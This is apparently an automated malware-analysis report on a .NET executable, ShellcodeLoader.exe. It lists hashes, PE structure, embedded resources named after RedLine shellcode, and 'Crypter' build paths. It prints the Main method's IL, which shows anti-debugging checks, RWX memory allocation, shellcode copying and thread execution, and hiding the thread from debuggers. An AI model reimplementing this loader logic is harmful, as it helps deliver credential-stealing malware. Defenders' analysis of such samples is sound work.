Suspicious
Suspect

308e6daeabe60a18225112c8a15b8316

PE Executable | MD5: 308e6daeabe60a18225112c8a15b8316 | Size: 473.6 KB | application/x-dosexec


Characteristics

Symbol Obfuscation Score

Very low

Hash | Hash Value
MD5 | 308e6daeabe60a18225112c8a15b8316
Sha1 | 93766d0e67da75e33b16f237d39d9f93320ee8e8
Sha256 | 67559021bb3b13bef30226a052dd097156aa998543f4a3689649f4e00de86686
Sha384 | c2eb774feb63d08c5bca99ef6c2a40758be09bd62bb316d2893d774d7ee53fb2f2e71c163a58c325cd0389d9948d3435
Sha512 | 77e20f0190bc000d2523a85e1cac598b8ceee67d514f51b519fcd00a3f4b537a9a34070c508d156e9d772e58b90c47b0cdd6106d49e76c7b39c7fbed83333ddb
SSDeep | 12288:+oIoLkq/s+veQ3kzchV0Vd0e0CwMAxU5SEIXWQwaw18i:lrQgs+veQUzcD0VGCJAC5SEEwh18
TLSH | E6A4232267F241E1D160A13EED319596DF7071AA173C078F72BE89A61B233129B1D3F9

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
ShellcodeLoader.redline.bin
ShellcodeLoader.shellcode.bin
costura.costura.dll.compressed
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
costura.costura.pdb.compressed
costura.metadata
Information
Name | Value
Module Name | ShellcodeLoader.exe
Full Name | ShellcodeLoader.exe
EntryPoint | System.Void ShellcodeLoader.Program::Main(System.String[])
Scope Name | ShellcodeLoader.exe
Scope Type | ModuleDef
Kind | Console
Runtime Version | v4.0.30319
Tables Header Version | 512
WinMD Version | <null>
Assembly Name | ShellcodeLoader
Assembly Version | 1.0.0.0
Assembly Culture | <null>
Has PublicKey | False
PublicKey Token | <null>
Target Framework | .NETFramework,Version=v4.7.2
Total Strings | 16
Main Method | System.Void ShellcodeLoader.Program::Main(System.String[])
Main IL Instruction Count | 202

Main IL

nop <null> nop <null> call System.Boolean ShellcodeLoader.Program::IsDebuggerDetected() stloc.s V_4 ldloc.s V_4 brfalse.s IL_0021: call System.Int64 System.Diagnostics.Stopwatch::GetTimestamp() nop <null> ldstr Fuck off, debugger detected. Exiting this shit. call System.Void System.Console::WriteLine(System.String) nop <null> ldc.i4.1 <null> call System.Void System.Environment::Exit(System.Int32) nop <null> nop <null> call System.Int64 System.Diagnostics.Stopwatch::GetTimestamp() stloc.0 <null> ldc.i4.1 <null> call System.Void System.Threading.Thread::Sleep(System.Int32) nop <null> call System.Int64 System.Diagnostics.Stopwatch::GetTimestamp() stloc.1 <null> ldloc.1 <null> ldloc.0 <null> sub <null> conv.r8 <null> ldsfld System.Int64 System.Diagnostics.Stopwatch::Frequency conv.r8 <null> div <null> ldc.r8 1000 mul <null> stloc.2 <null> ldloc.2 <null> ldc.r8 100 cgt <null> stloc.s V_5 ldloc.s V_5 brfalse.s IL_0070: ldstr "ShellcodeLoader.redline.bin" nop <null> ldstr Shit, timing check failed. Debugger's probably fucking with us. 
call System.Void System.Console::WriteLine(System.String) nop <null> ldc.i4.1 <null> call System.Void System.Environment::Exit(System.Int32) nop <null> nop <null> ldstr ShellcodeLoader.redline.bin stloc.3 <null> ldstr Listing embedded resources for debug: call System.Void System.Console::WriteLine(System.String) nop <null> nop <null> call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() callvirt System.String[] System.Reflection.Assembly::GetManifestResourceNames() stloc.s V_6 ldc.i4.0 <null> stloc.s V_7 br.s IL_00B4: ldloc.s V_7 ldloc.s V_6 ldloc.s V_7 ldelem.ref <null> stloc.s V_8 nop <null> ldstr Found resource: ldloc.s V_8 call System.String System.String::Concat(System.String,System.String) call System.Void System.Console::WriteLine(System.String) nop <null> nop <null> ldloc.s V_7 ldc.i4.1 <null> add <null> stloc.s V_7 ldloc.s V_7 ldloc.s V_6 ldlen <null> conv.i4 <null> blt.s IL_0093: ldloc.s V_6 call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() ldloc.3 <null> callvirt System.IO.Stream System.Reflection.Assembly::GetManifestResourceStream(System.String) stloc.s V_9 nop <null> ldloc.s V_9 ldnull <null> ceq <null> stloc.s V_15 ldloc.s V_15 brfalse.s IL_00EC: ldloc.s V_9 nop <null> ldstr Fuck, couldn't find the embedded resource: ldloc.3 <null> call System.String System.String::Concat(System.String,System.String) call System.Void System.Console::WriteLine(System.String) nop <null> leave IL_01FE: ret ldloc.s V_9 newobj System.Void System.IO.BinaryReader::.ctor(System.IO.Stream) stloc.s V_16 nop <null> ldloc.s V_16 ldloc.s V_9 callvirt System.Int64 System.IO.Stream::get_Length() conv.i4 <null> callvirt System.Byte[] System.IO.BinaryReader::ReadBytes(System.Int32) stloc.s V_10 nop <null> leave.s IL_0117: ldsfld System.IntPtr System.IntPtr::Zero ldloc.s V_16 brfalse.s IL_0116: endfinally ldloc.s V_16 callvirt System.Void System.IDisposable::Dispose() nop <null> endfinally <null> ldsfld System.IntPtr 
System.IntPtr::Zero ldloc.s V_10 ldlen <null> conv.i4 <null> ldc.i4 12288 ldc.i4.s 64 call System.IntPtr ShellcodeLoader.Program::VirtualAlloc(System.IntPtr,System.UInt32,System.UInt32,System.UInt32) stloc.s V_11 ldloc.s V_11 ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Equality(System.IntPtr,System.IntPtr) stloc.s V_17 ldloc.s V_17 brfalse.s IL_0151: ldloc.s V_10 nop <null> ldstr Shit, memory allocation failed. call System.Void System.Console::WriteLine(System.String) nop <null> leave IL_01FE: ret ldloc.s V_10 ldc.i4.0 <null> ldloc.s V_11 ldloc.s V_10 ldlen <null> conv.i4 <null> call System.Void System.Runtime.InteropServices.Marshal::Copy(System.Byte[],System.Int32,System.IntPtr,System.Int32) nop <null> ldsfld System.IntPtr System.IntPtr::Zero ldc.i4.0 <null> ldloc.s V_11 ldsfld System.IntPtr System.IntPtr::Zero ldc.i4.0 <null> ldloca.s V_12 call System.IntPtr ShellcodeLoader.Program::CreateThread(System.IntPtr,System.UInt32,System.IntPtr,System.IntPtr,System.UInt32,System.UInt32&) stloc.s V_13 ldloc.s V_13 ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Equality(System.IntPtr,System.IntPtr) stloc.s V_18 ldloc.s V_18 brfalse.s IL_0197: ldloc.s V_13 nop <null> ldstr Damn, thread creation failed. call System.Void System.Console::WriteLine(System.String) nop <null> leave.s IL_01FE: ret ldloc.s V_13 ldc.i4.s 17 ldsfld System.IntPtr System.IntPtr::Zero ldc.i4.0 <null> ldsfld System.IntPtr System.IntPtr::Zero call System.Int32 ShellcodeLoader.Program::NtQueryInformationThread(System.IntPtr,System.Int32,System.IntPtr,System.Int32,System.IntPtr) stloc.s V_14 ldloc.s V_14 ldc.i4.0 <null> cgt.un <null> stloc.s V_19 ldloc.s V_19 brfalse.s IL_01C5: ldloc.s V_13 nop <null> ldstr Fuck, failed to hide thread from debugger. 
call System.Void System.Console::WriteLine(System.String) nop <null> nop <null> ldloc.s V_13 ldc.i4.m1 <null> call System.UInt32 ShellcodeLoader.Program::WaitForSingleObject(System.IntPtr,System.UInt32) pop <null> nop <null> leave.s IL_01DE: nop ldloc.s V_9 brfalse.s IL_01DD: endfinally ldloc.s V_9 callvirt System.Void System.IDisposable::Dispose() nop <null> endfinally <null> nop <null> leave.s IL_01FE: ret stloc.s V_20 nop <null> ldstr Fucking error: ldloc.s V_20 callvirt System.String System.Exception::get_Message() call System.String System.String::Concat(System.String,System.String) call System.Void System.Console::WriteLine(System.String) nop <null> nop <null> leave.s IL_01FE: ret ret <null>


Artefacts
Name | Value
PDB Path | D:\Crypter\C# SHellcode\Loader\obj\Debug\net472\ShellcodeLoader.pdb
PDB Path | C:\CI_WS\Ws\274459\Source\Costura_Fody\src\Costura\obj\Release\netstandard2.0\Costura.pdb
